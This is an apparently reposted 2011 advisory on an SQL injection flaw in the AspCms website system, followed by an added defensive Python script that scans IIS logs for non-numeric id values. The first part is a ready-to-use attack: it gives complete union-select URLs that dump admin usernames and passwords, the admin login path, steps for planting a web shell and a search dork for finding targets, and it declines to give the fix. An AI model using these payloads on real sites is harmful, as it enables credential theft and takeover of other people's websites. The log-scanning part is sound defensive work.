AspCms enterprise website system 0day affecting all versions 2.0 and above

2011-09-06T00:00:00
ID MYHACK58:62201131776
Type myhack58
Reporter Anonymous
Modified 2011-09-06T00:00:00

Description

AspCms is an open-source enterprise site-building system built on a newly developed core. It can meet a variety of enterprise website requirements, supports template customization and extensions, and lets an enterprise build a site in a short time.

The vulnerability is in

/plug/productbuy.asp

The received parameter id is not filtered, which results in a SQL injection vulnerability.

After the injection the page redirects very quickly, so it is recommended to copy the result with a keyboard shortcut.

Dump the username: /plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

This dumps the account name for ID=1; if that account turns out to have insufficient privileges, go on to test 2, 3, 4, ...

Dump the password: /plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

Back-end (admin) login address: /admin/login.asp

Getting a shell from the back end

1. Direct upload of .asp;x

2. The system configuration information

3. Template management: create a new 1.asp template; the content is written mA content.

Search keywords: intitle:Powered by AspCms2

The repair method is not covered here; you know what to do.
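The root cause described above is an unfiltered id parameter that should only ever carry a number, so one way to review web logs for attempts against this endpoint is to flag every request to /plug/productbuy.asp whose id is not a plain integer. This is an added example, not code from the original advisory or from AspCms; the IIS W3C log layout, the sample lines and the function name are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

TARGET = "/plug/productbuy.asp"        # path named in the advisory
NUMERIC_ID = re.compile(r"\d{1,10}")   # assumption: legitimate ids are short decimal integers

# Constructed sample in IIS W3C extended format (not real traffic).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2011-09-06 10:01:02 GET /plug/productbuy.asp id=2 192.0.2.10 200
2011-09-06 10:01:05 GET /plug/productbuy.asp id=2+union+select+1,2,LoginName,4+from+AspCms_User 192.0.2.66 302
2011-09-06 10:01:09 GET /PLUG/ProductBuy.asp ID=2%20union%20select%201 192.0.2.66 302
2011-09-06 10:02:00 GET /plug/comment.asp id=7 192.0.2.10 200
2011-09-06 10:03:00 GET /plug/productbuy.asp - 192.0.2.11 200
"""

def find_suspicious_requests(log_text):
    """Return (timestamp, client_ip, decoded_id) for requests to TARGET with a non-numeric id."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # IIS and classic ASP treat paths and parameter names case-insensitively.
        if row.get("cs-uri-stem", "").lower() != TARGET:
            continue
        # parse_qs URL-decodes values, so '+' and %20 both become spaces.
        params = parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True)
        for name, values in params.items():
            if name.lower() != "id":
                continue
            for value in values:
                # Allow-list check: anything that is not a bare integer is flagged.
                if not NUMERIC_ID.fullmatch(value):
                    hits.append((f"{row['date']} {row['time']}", row["c-ip"], value))
    return hits

if __name__ == "__main__":
    for ts, ip, value in find_suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} non-numeric id: {value!r}")
```

The same allow-list test (accept the id only if it is a bare integer) is the input check the endpoint lacks; matching on the expected format rather than on SQL keywords keeps the rule independent of how a payload is written.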